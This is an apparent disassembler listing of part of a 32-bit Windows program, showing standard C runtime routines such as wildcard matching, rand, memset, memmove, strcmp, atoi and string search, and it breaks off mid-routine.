; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4171B1 proc near ; CODE XREF: sub_40F6F1+6310�p
; sub_4172DF+6B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push 1
pop eax
loc_4171BB: ; CODE XREF: sub_4171B1+68�j
mov cl, [esi]
test cl, cl
jz short loc_41721B
cmp eax, 1
jnz short loc_41721B
mov edx, [ebp+arg_4]
mov dl, [edx]
test dl, dl
jz short loc_41721B
cmp cl, 2Ah
jz short loc_417202
cmp cl, 3Fh
jz short loc_4171E5
cmp cl, 5Bh
jz short loc_4171EA
xor eax, eax
cmp cl, dl
setz al
loc_4171E5: ; CODE XREF: sub_4171B1+26�j
inc [ebp+arg_4]
jmp short loc_417215
; ---------------------------------------------------------------------------
loc_4171EA: ; CODE XREF: sub_4171B1+2B�j
lea eax, [ebp+arg_4]
inc esi
push eax
lea eax, [ebp+arg_0]
push eax
mov [ebp+arg_0], esi
call sub_417247
mov esi, [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_417215
; ---------------------------------------------------------------------------
loc_417202: ; CODE XREF: sub_4171B1+21�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_4172DF
mov esi, [ebp+arg_0]
pop ecx
pop ecx
dec esi
loc_417215: ; CODE XREF: sub_4171B1+37�j
; sub_4171B1+4F�j
inc esi
mov [ebp+arg_0], esi
jmp short loc_4171BB
; ---------------------------------------------------------------------------
loc_41721B: ; CODE XREF: sub_4171B1+E�j
; sub_4171B1+13�j ...
cmp byte ptr [esi], 2Ah
jnz short loc_41722B
cmp eax, 1
jnz short loc_417242
inc esi
mov [ebp+arg_0], esi
jmp short loc_41721B
; ---------------------------------------------------------------------------
loc_41722B: ; CODE XREF: sub_4171B1+6D�j
cmp eax, 1
jnz short loc_417242
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_417242
cmp byte ptr [esi], 0
jnz short loc_417242
push 1
pop eax
jmp short loc_417244
; ---------------------------------------------------------------------------
loc_417242: ; CODE XREF: sub_4171B1+72�j
; sub_4171B1+7D�j ...
xor eax, eax
loc_417244: ; CODE XREF: sub_4171B1+8F�j
pop esi
pop ebp
retn
sub_4171B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417247 proc near ; CODE XREF: sub_4171B1+45�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+arg_0]
push edi
xor edi, edi
push 1
mov ecx, [edx]
and [ebp+var_8], edi
pop eax
cmp byte ptr [ecx], 21h
mov [ebp+var_4], eax
jnz short loc_417268
inc ecx
mov [ebp+var_8], eax
mov [edx], ecx
loc_417268: ; CODE XREF: sub_417247+19�j
push ebx
push esi
loc_41726A: ; CODE XREF: sub_417247+7B�j
mov ecx, [edx]
mov bl, [ecx]
cmp bl, 5Dh
jnz short loc_417278
cmp [ebp+var_4], eax
jnz short loc_4172C4
loc_417278: ; CODE XREF: sub_417247+2A�j
test edi, edi
jnz short loc_4172B9
cmp bl, 2Dh
jnz short loc_4172AD
mov al, [ecx+1]
lea esi, [ecx+1]
mov cl, [ecx-1]
cmp cl, al
jge short loc_4172AD
cmp al, 5Dh
jz short loc_4172AD
cmp [ebp+var_4], edi
jnz short loc_4172AD
mov ebx, [ebp+arg_4]
mov ebx, [ebx]
mov bl, [ebx]
cmp bl, cl
jl short loc_4172B9
cmp bl, al
jg short loc_4172B9
push 1
mov [edx], esi
pop edi
jmp short loc_4172B9
; ---------------------------------------------------------------------------
loc_4172AD: ; CODE XREF: sub_417247+38�j
; sub_417247+45�j ...
mov eax, [ebp+arg_4]
mov eax, [eax]
cmp bl, [eax]
jnz short loc_4172B9
push 1
pop edi
loc_4172B9: ; CODE XREF: sub_417247+33�j
; sub_417247+59�j ...
inc dword ptr [edx]
and [ebp+var_4], 0
push 1
pop eax
jmp short loc_41726A
; ---------------------------------------------------------------------------
loc_4172C4: ; CODE XREF: sub_417247+2F�j
cmp [ebp+var_8], eax
pop esi
pop ebx
jnz short loc_4172D1
mov ecx, eax
sub ecx, edi
mov edi, ecx
loc_4172D1: ; CODE XREF: sub_417247+82�j
cmp edi, eax
jnz short loc_4172DA
mov eax, [ebp+arg_4]
inc dword ptr [eax]
loc_4172DA: ; CODE XREF: sub_417247+8C�j
mov eax, edi
pop edi
leave
retn
sub_417247 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4172DF proc near ; CODE XREF: sub_4171B1+59�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], 1
inc dword ptr [esi]
mov ecx, [esi]
mov eax, [edi]
xor ebx, ebx
loc_4172FB: ; CODE XREF: sub_4172DF+3A�j
cmp [eax], bl
jz short loc_41731B
mov cl, [ecx]
cmp cl, 3Fh
jz short loc_417310
cmp cl, 2Ah
jnz short loc_41731B
cmp cl, 3Fh
jnz short loc_417313
loc_417310: ; CODE XREF: sub_4172DF+25�j
inc eax
mov [edi], eax
loc_417313: ; CODE XREF: sub_4172DF+2F�j
inc dword ptr [esi]
mov ecx, [esi]
mov eax, [edi]
jmp short loc_4172FB
; ---------------------------------------------------------------------------
loc_41731B: ; CODE XREF: sub_4172DF+1E�j
; sub_4172DF+2A�j ...
mov eax, [esi]
cmp byte ptr [eax], 2Ah
jnz short loc_417326
inc dword ptr [esi]
jmp short loc_41731B
; ---------------------------------------------------------------------------
loc_417326: ; CODE XREF: sub_4172DF+41�j
mov eax, [edi]
mov cl, [eax]
cmp cl, bl
jnz short loc_417347
mov edx, [esi]
cmp [edx], bl
jz short loc_417338
xor eax, eax
jmp short loc_4173A7
; ---------------------------------------------------------------------------
loc_417338: ; CODE XREF: sub_4172DF+53�j
cmp cl, bl
jnz short loc_417347
mov ecx, [esi]
cmp [ecx], bl
jnz short loc_417347
push 1
pop eax
jmp short loc_4173A7
; ---------------------------------------------------------------------------
loc_417347: ; CODE XREF: sub_4172DF+4D�j
; sub_4172DF+5B�j ...
push eax
push dword ptr [esi]
call sub_4171B1
pop ecx
test eax, eax
pop ecx
jnz short loc_417391
loc_417355: ; CODE XREF: sub_4172DF+B0�j
inc dword ptr [edi]
mov eax, [edi]
loc_417359: ; CODE XREF: sub_4172DF+90�j
mov ecx, [esi]
mov dl, [eax]
mov cl, [ecx]
cmp cl, dl
jz short loc_417371
cmp cl, 5Bh
jz short loc_417371
cmp dl, bl
jz short loc_417371
inc eax
mov [edi], eax
jmp short loc_417359
; ---------------------------------------------------------------------------
loc_417371: ; CODE XREF: sub_4172DF+82�j
; sub_4172DF+87�j ...
mov eax, [edi]
cmp [eax], bl
jz short loc_417388
push eax
push dword ptr [esi]
call sub_4171B1
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_41738D
; ---------------------------------------------------------------------------
loc_417388: ; CODE XREF: sub_4172DF+96�j
mov [ebp+var_4], ebx
xor eax, eax
loc_41738D: ; CODE XREF: sub_4172DF+A7�j
cmp eax, ebx
jnz short loc_417355
loc_417391: ; CODE XREF: sub_4172DF+74�j
mov eax, [edi]
cmp [eax], bl
jnz short loc_4173A4
mov eax, [esi]
cmp [eax], bl
jnz short loc_4173A4
mov [ebp+var_4], 1
loc_4173A4: ; CODE XREF: sub_4172DF+B6�j
; sub_4172DF+BC�j
mov eax, [ebp+var_4]
loc_4173A7: ; CODE XREF: sub_4172DF+57�j
; sub_4172DF+66�j
pop edi
pop esi
pop ebx
leave
retn
sub_4172DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4173AC proc near ; CODE XREF: sub_401000+61�p
; sub_4010B2+308�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
lea eax, [ebp+arg_8]
mov [ebp+var_14], 42h
push eax
lea eax, [ebp+var_20]
push [ebp+arg_4]
mov [ebp+var_1C], 7FFFFFFFh
push eax
call sub_419343
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_4173EC
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_4173F9
; ---------------------------------------------------------------------------
loc_4173EC: ; CODE XREF: sub_4173AC+36�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_41922E
pop ecx
pop ecx
loc_4173F9: ; CODE XREF: sub_4173AC+3E�j
mov eax, esi
pop esi
leave
retn
sub_4173AC endp
; =============== S U B R O U T I N E =======================================
sub_4173FE proc near ; CODE XREF: sub_401000+2E�p
; sub_401D79+46�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_43B56C, eax
retn
sub_4173FE endp
; =============== S U B R O U T I N E =======================================
sub_417408 proc near ; CODE XREF: sub_4010B2+CB�p
; sub_4010B2+13F�p ...
mov eax, dword_43B56C
imul eax, 343FDh
add eax, 269EC3h
mov dword_43B56C, eax
sar eax, 10h
and eax, 7FFFh
retn
sub_417408 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417430 proc near ; CODE XREF: sub_4010B2+281�p
; sub_401447+180�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_417483
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_417477
neg ecx
and ecx, 3
jz short loc_417459
sub edx, ecx
loc_417453: ; CODE XREF: sub_417430+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_417453
loc_417459: ; CODE XREF: sub_417430+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_417477
rep stosd
test edx, edx
jz short loc_41747D
loc_417477: ; CODE XREF: sub_417430+18�j
; sub_417430+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_417477
loc_41747D: ; CODE XREF: sub_417430+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_417483: ; CODE XREF: sub_417430+A�j
mov eax, [esp+arg_0]
retn
sub_417430 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417490 proc near ; CODE XREF: sub_4010B2+22D�p
; sub_4010B2+23E�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_4174B0
cmp edi, eax
jb loc_417628
loc_4174B0: ; CODE XREF: sub_417490+16�j
test edi, 3
jnz short loc_4174CC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4174EC
rep movsd
jmp off_4175D8[edx*4]
; ---------------------------------------------------------------------------
loc_4174CC: ; CODE XREF: sub_417490+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_4174E4
and eax, 3
add ecx, eax
jmp dword ptr loc_4174EC+4[eax*4]
; ---------------------------------------------------------------------------
loc_4174E4: ; CODE XREF: sub_417490+46�j
jmp dword ptr loc_4175E8[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4174EC: ; CODE XREF: sub_417490+31�j
; sub_417490+8E�j ...
jmp off_41756C[ecx*4]
; ---------------------------------------------------------------------------
db 90h
dd offset loc_417500
dd offset loc_41752C
dd offset loc_417550
; ---------------------------------------------------------------------------
loc_417500: ; DATA XREF: sub_417490+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4174EC
rep movsd
jmp off_4175D8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41752C: ; DATA XREF: sub_417490+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4174EC
rep movsd
jmp off_4175D8[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_417550: ; DATA XREF: sub_417490+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_4174EC
rep movsd
jmp off_4175D8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41756C dd offset loc_4175CF ; DATA XREF: sub_417490:loc_4174EC�r
dd offset loc_4175BC
dd offset loc_4175B4
dd offset loc_4175AC
dd offset loc_4175A4
dd offset loc_41759C
dd offset loc_417594
dd offset loc_41758C
; ---------------------------------------------------------------------------
loc_41758C: ; CODE XREF: sub_417490:loc_4174EC�j
; DATA XREF: sub_417490+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_417594: ; CODE XREF: sub_417490:loc_4174EC�j
; DATA XREF: sub_417490+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_41759C: ; CODE XREF: sub_417490:loc_4174EC�j
; DATA XREF: sub_417490+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_4175A4: ; CODE XREF: sub_417490:loc_4174EC�j
; DATA XREF: sub_417490+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_4175AC: ; CODE XREF: sub_417490:loc_4174EC�j
; DATA XREF: sub_417490+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_4175B4: ; CODE XREF: sub_417490:loc_4174EC�j
; DATA XREF: sub_417490+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_4175BC: ; CODE XREF: sub_417490:loc_4174EC�j
; DATA XREF: sub_417490+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4175CF: ; CODE XREF: sub_417490:loc_4174EC�j
; DATA XREF: sub_417490:off_41756C�o
jmp off_4175D8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4175D8 dd offset loc_4175E8 ; DATA XREF: sub_417490+35�r
; sub_417490+92�r ...
dd offset loc_4175F0
dd offset loc_4175FC
dd offset loc_417610
; ---------------------------------------------------------------------------
loc_4175E8: ; CODE XREF: sub_417490+35�j
; sub_417490+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4175F0: ; CODE XREF: sub_417490+35�j
; sub_417490+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4175FC: ; CODE XREF: sub_417490+35�j
; sub_417490+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_417610: ; CODE XREF: sub_417490+35�j
; sub_417490+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_417628: ; CODE XREF: sub_417490+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_41765C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_417650
std
rep movsd
cld
jmp off_417770[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_417650: ; CODE XREF: sub_417490+1B1�j
; sub_417490+208�j ...
neg ecx
jmp off_417720[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41765C: ; CODE XREF: sub_417490+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_417674
and eax, 3
sub ecx, eax
jmp dword ptr loc_417674+4[eax*4]
; ---------------------------------------------------------------------------
loc_417674: ; CODE XREF: sub_417490+1D6�j
; DATA XREF: sub_417490+1DD�r
jmp off_417770[ecx*4]
; ---------------------------------------------------------------------------
align 4
mov [esi+41h], dh
add [eax-2FFFBE8Ah], ch
jbe short loc_4176C8
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_417650
std
rep movsd
cld
jmp off_417770[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_417650
std
rep movsd
cld
loc_4176C8: ; CODE XREF: sub_417490+1F5�j
jmp off_417770[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_417650
std
rep movsd
cld
jmp off_417770[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_417724
dd offset loc_41772C
dd offset loc_417734
dd offset loc_41773C
dd offset loc_417744
dd offset loc_41774C
dd offset loc_417754
off_417720 dd offset loc_417767 ; DATA XREF: sub_417490+1C2�r
; ---------------------------------------------------------------------------
loc_417724: ; DATA XREF: sub_417490+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_41772C: ; DATA XREF: sub_417490+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_417734: ; DATA XREF: sub_417490+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_41773C: ; DATA XREF: sub_417490+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_417744: ; DATA XREF: sub_417490+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_41774C: ; DATA XREF: sub_417490+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_417754: ; DATA XREF: sub_417490+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_417767: ; CODE XREF: sub_417490+1C2�j
; DATA XREF: sub_417490:off_417720�o
jmp off_417770[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_417770 dd offset loc_417780 ; DATA XREF: sub_417490+1B7�r
; sub_417490:loc_417674�r ...
dd offset loc_417788
dd offset loc_417798
dd offset loc_4177AC
; ---------------------------------------------------------------------------
loc_417780: ; CODE XREF: sub_417490+1B7�j
; sub_417490:loc_417674�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_417788: ; CODE XREF: sub_417490+1B7�j
; sub_417490:loc_417674�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_417798: ; CODE XREF: sub_417490+1B7�j
; sub_417490:loc_417674�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4177AC: ; CODE XREF: sub_417490+1B7�j
; sub_417490:loc_417674�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_417490 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4177D0 proc near ; CODE XREF: sub_4010B2+FC�p
; sub_4010B2+118�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_41781C
loc_4177E0: ; CODE XREF: sub_4177D0+3C�j
; sub_4177D0+66�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_417814
or al, al
jz short loc_417810
cmp ah, [ecx+1]
jnz short loc_417814
or ah, ah
jz short loc_417810
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_417814
or al, al
jz short loc_417810
cmp ah, [ecx+3]
jnz short loc_417814
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_4177E0
mov edi, edi
loc_417810: ; CODE XREF: sub_4177D0+18�j
; sub_4177D0+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_417814: ; CODE XREF: sub_4177D0+14�j
; sub_4177D0+1D�j ...
sbb eax, eax
shl eax, 1
inc eax
retn
; ---------------------------------------------------------------------------
align 4
loc_41781C: ; CODE XREF: sub_4177D0+E�j
test edx, 1
jz short loc_417838
mov al, [edx]
inc edx
cmp al, [ecx]
jnz short loc_417814
inc ecx
or al, al
jz short loc_417810
test edx, 2
jz short loc_4177E0
loc_417838: ; CODE XREF: sub_4177D0+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_417814
or al, al
jz short loc_417810
cmp ah, [ecx+1]
jnz short loc_417814
or ah, ah
jz short loc_417810
add ecx, 2
jmp short loc_4177E0
sub_4177D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417860 proc near ; CODE XREF: sub_4010B2+19E�p
; sub_401A6D+11B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_417879
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_417879: ; CODE XREF: sub_417860+E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_417860 endp
; =============== S U B R O U T I N E =======================================
sub_417894 proc near ; CODE XREF: sub_41791F+4�p
; sub_41DD12+1A2�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
loc_41789C: ; CODE XREF: sub_417894+34�j
cmp dword_43B7AC, 1
jle short loc_4178B4
movzx eax, byte ptr [edi]
push 8
push eax
call sub_419B4D
pop ecx
pop ecx
jmp short loc_4178C3
; ---------------------------------------------------------------------------
loc_4178B4: ; CODE XREF: sub_417894+F�j
movzx eax, byte ptr [edi]
mov ecx, off_43B5A0
mov al, [ecx+eax*2]
and eax, 8
loc_4178C3: ; CODE XREF: sub_417894+1E�j
test eax, eax
jz short loc_4178CA
inc edi
jmp short loc_41789C
; ---------------------------------------------------------------------------
loc_4178CA: ; CODE XREF: sub_417894+31�j
movzx esi, byte ptr [edi]
inc edi
cmp esi, 2Dh
mov ebp, esi
jz short loc_4178DA
cmp esi, 2Bh
jnz short loc_4178DE
loc_4178DA: ; CODE XREF: sub_417894+3F�j
movzx esi, byte ptr [edi]
inc edi
loc_4178DE: ; CODE XREF: sub_417894+44�j
xor ebx, ebx
loc_4178E0: ; CODE XREF: sub_417894+7B�j
cmp dword_43B7AC, 1
jle short loc_4178F5
push 4
push esi
call sub_419B4D
pop ecx
pop ecx
jmp short loc_417900
; ---------------------------------------------------------------------------
loc_4178F5: ; CODE XREF: sub_417894+53�j
mov eax, off_43B5A0
mov al, [eax+esi*2]
and eax, 4
loc_417900: ; CODE XREF: sub_417894+5F�j
test eax, eax
jz short loc_417911
lea eax, [ebx+ebx*4]
lea ebx, [esi+eax*2-30h]
movzx esi, byte ptr [edi]
inc edi
jmp short loc_4178E0
; ---------------------------------------------------------------------------
loc_417911: ; CODE XREF: sub_417894+6E�j
cmp ebp, 2Dh
mov eax, ebx
jnz short loc_41791A
neg eax
loc_41791A: ; CODE XREF: sub_417894+82�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_417894 endp
; =============== S U B R O U T I N E =======================================
sub_41791F proc near ; CODE XREF: sub_4013E9+12�p
; sub_4013E9+1D�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_417894
pop ecx
retn
sub_41791F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41792A proc near ; CODE XREF: sub_401447+318�p
; sub_401D79+460�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_14], 42h
mov [ebp+var_1C], eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_20]
push [ebp+arg_8]
push eax
call sub_419343
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_417969
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_417976
; ---------------------------------------------------------------------------
loc_417969: ; CODE XREF: sub_41792A+35�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_41922E
pop ecx
pop ecx
loc_417976: ; CODE XREF: sub_41792A+3D�j
mov eax, esi
pop esi
leave
retn
sub_41792A endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417980 proc near ; CODE XREF: sub_401D79+2D8�p
; sub_401D79+2F8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_4179FA
mov dh, [ecx+1]
test dh, dh
jz short loc_4179E7
loc_417998: ; CODE XREF: sub_417980+52�j
; sub_417980+65�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
inc esi
cmp al, dl
jz short loc_4179BA
test al, al
jz short loc_4179B4
loc_4179A9: ; CODE XREF: sub_417980+32�j
mov al, [esi]
inc esi
loc_4179AC: ; CODE XREF: sub_417980+3F�j
cmp al, dl
jz short loc_4179BA
test al, al
jnz short loc_4179A9
loc_4179B4: ; CODE XREF: sub_417980+27�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4179BA: ; CODE XREF: sub_417980+23�j
; sub_417980+2E�j
mov al, [esi]
inc esi
cmp al, dh
jnz short loc_4179AC
lea edi, [esi-1]
loc_4179C4: ; CODE XREF: sub_417980+63�j
mov ah, [ecx+2]
test ah, ah
jz short loc_4179F3
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_417998
mov al, [ecx+3]
test al, al
jz short loc_4179F3
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_4179C4
jmp short loc_417998
; ---------------------------------------------------------------------------
loc_4179E7: ; CODE XREF: sub_417980+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_418636
; ---------------------------------------------------------------------------
loc_4179F3: ; CODE XREF: sub_417980+49�j
; sub_417980+59�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_4179FA: ; CODE XREF: sub_417980+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_417980 endp
; =============== S U B R O U T I N E =======================================
sub_417A00 proc near ; CODE XREF: sub_405A6A+2BF�p
; sub_40A74C+75�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_417A71
sub_417A00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417A10 proc near ; CODE XREF: sub_402368+484�p
; sub_406047+15D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_417A2C
loc_417A1D: ; CODE XREF: sub_417A10+1A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_417A5F
test ecx, 3
jnz short loc_417A1D
loc_417A2C: ; CODE XREF: sub_417A10+B�j
; sub_417A10+32�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_417A2C
mov eax, [ecx-4]
test al, al
jz short loc_417A6E
test ah, ah
jz short loc_417A69
test eax, 0FF0000h
jz short loc_417A64
test eax, 0FF000000h
jz short loc_417A5F
jmp short loc_417A2C
; ---------------------------------------------------------------------------
loc_417A5F: ; CODE XREF: sub_417A10+12�j
; sub_417A10+4B�j
lea edi, [ecx-1]
jmp short loc_417A71
; ---------------------------------------------------------------------------
loc_417A64: ; CODE XREF: sub_417A10+44�j
lea edi, [ecx-2]
jmp short loc_417A71
; ---------------------------------------------------------------------------
loc_417A69: ; CODE XREF: sub_417A10+3D�j
